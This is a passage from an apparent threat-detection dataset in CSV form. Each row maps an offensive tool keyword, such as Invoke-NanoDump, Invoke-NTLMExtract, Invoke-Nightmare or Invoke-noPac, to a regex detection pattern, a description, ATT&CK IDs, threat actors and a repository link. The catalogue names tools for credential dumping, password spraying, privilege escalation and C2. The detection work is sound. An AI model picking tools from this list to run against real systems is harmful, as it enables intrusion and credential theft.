- T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - 
T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49213" "*Invoke-MS16-032.ps1*",".{0,1000}Invoke\-MS16\-032\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49214" "*Invoke-MS16-032.ps1*",".{0,1000}Invoke\-MS16\-032\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","49215" "*Invoke-MS16135*",".{0,1000}Invoke\-MS16135.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-MS16135.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49216" "*Invoke-MSSprinkler*",".{0,1000}Invoke\-MSSprinkler.{0,1000}","offensive_tool_keyword","MSSprinkler","password spraying utility for organizations to test their M365 accounts from an external perspective. 
It employs a 'low-and-slow' approach","T1110.003 - T1110.001","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/TheresAFewConors/MSSprinkler","1","1","N/A","N/A","9","1","74","7","2025-02-25T13:32:41Z","2024-09-15T09:54:53Z","49217" "*Invoke-MSSQLup*",".{0,1000}Invoke\-MSSQLup.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49218" "*Invoke-NamedPipePermissionsCheck*",".{0,1000}Invoke\-NamedPipePermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49219" "*Invoke-NanoDump*",".{0,1000}Invoke\-NanoDump.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49220" "*Invoke-NanoDump*",".{0,1000}Invoke\-NanoDump.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation 
tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49221" "*Invoke-NETMongoose*",".{0,1000}Invoke\-NETMongoose.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49222" "*Invoke-NetRipper*",".{0,1000}Invoke\-NetRipper.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1069","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49223" "*Invoke-NetRipper*",".{0,1000}Invoke\-NetRipper.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","1","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","49224" "*Invoke-NetRipper.ps1*",".{0,1000}Invoke\-NetRipper\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams 
and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49225" "*Invoke-NetworkAdaptersCheck*",".{0,1000}Invoke\-NetworkAdaptersCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49226" "*Invoke-NetworkRelay*",".{0,1000}Invoke\-NetworkRelay.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49227" "*Invoke-NetworkRelay.ps1*",".{0,1000}Invoke\-NetworkRelay\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49228" "*Invoke-Nightmare *",".{0,1000}Invoke\-Nightmare\s.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/calebstewart/CVE-2021-1675","1","0","N/A","N/A","10","10","1049","230","2021-07-05T08:54:06Z","2021-07-01T23:45:58Z","49229" "*Invoke-Nightmare -DLL *",".{0,1000}Invoke\-Nightmare\s\-DLL\s.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49230" "*Invoke-Nightmare -NewUser*",".{0,1000}Invoke\-Nightmare\s\-NewUser.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49231" "*Invoke-Nightmare*",".{0,1000}Invoke\-Nightmare.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49232" 
"*Invoke-NinjaCopy*",".{0,1000}Invoke\-NinjaCopy.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49233" "*Invoke-NinjaCopy*",".{0,1000}Invoke\-NinjaCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used 
to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49234" "*Invoke-NinjaCopy*",".{0,1000}Invoke\-NinjaCopy.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","49235" "*Invoke-NinjaCopy*",".{0,1000}Invoke\-NinjaCopy.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","49236" "*Invoke-NinjaCopy.ps1*",".{0,1000}Invoke\-NinjaCopy\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration 
Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49237" "*Invoke-noPac.*",".{0,1000}Invoke\-noPac\..{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tool","https://github.com/ricardojba/Invoke-noPac","1","0","N/A","N/A","N/A","1","62","12","2023-02-16T10:45:19Z","2021-12-13T19:01:18Z","49238" "*Invoke-NTDS.ps1*",".{0,1000}Invoke\-NTDS\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49239" "*Invoke-NTLMAuth.ps1*",".{0,1000}Invoke\-NTLMAuth\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","49240" "*Invoke-NTLMExtract*",".{0,1000}Invoke\-NTLMExtract.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49241" "*Invoke-NTLMExtract*",".{0,1000}Invoke\-NTLMExtract.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49242" 
"*Invoke-NTLMExtract.ps1*",".{0,1000}Invoke\-NTLMExtract\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49243" "*Invoke-Ntsd.ps1*",".{0,1000}Invoke\-Ntsd\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
